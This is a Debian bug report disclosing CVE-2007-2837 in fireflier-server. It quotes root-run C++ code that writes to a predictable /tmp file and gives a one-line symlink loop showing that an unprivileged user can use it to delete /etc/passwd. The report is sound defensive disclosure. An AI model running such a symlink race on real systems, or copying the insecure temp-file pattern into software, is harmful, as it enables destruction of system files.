Package: fireflier-server
Version: 1.1.6-3
Severity: grave
Usertags: sourcescan
*** Please type your report below this line ***
Security issue: CVE-2007-2837.
The server, fireflierd, runs with root privileges and the code
contains this gem which I think speaks for itself:
string getRule(unsigned int chainid, int rulenum)
{
...
cmd="rm -f /tmp/fireflier.rules && touch /tmp/fireflier.rules &&
chmod 0700 /tmp/fireflier.rules && ";
cmd+=IPTABLES_SAVE;
cmd+=" > /tmp/fireflier.rules";
if(DEBUG)
cout<<"cmd: "<<cmd<<endl;
system(cmd.c_str());
...
}
This contains several race conditions, and can be trivially exploited to
remove any file on the server as root.
For example run this as a user inside GNU screen:
[EMAIL PROTECTED]:~$ while true; do ln -s /etc/passwd
/tmp/fireflier.rules; done
Wait for a root user to fetch/update/delete a rule using one of the available
clients, and the /etc/passwd file will be removed.
Steve
--
# Kink-Friendly Dating
http://ctrl-alt-date.com/
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
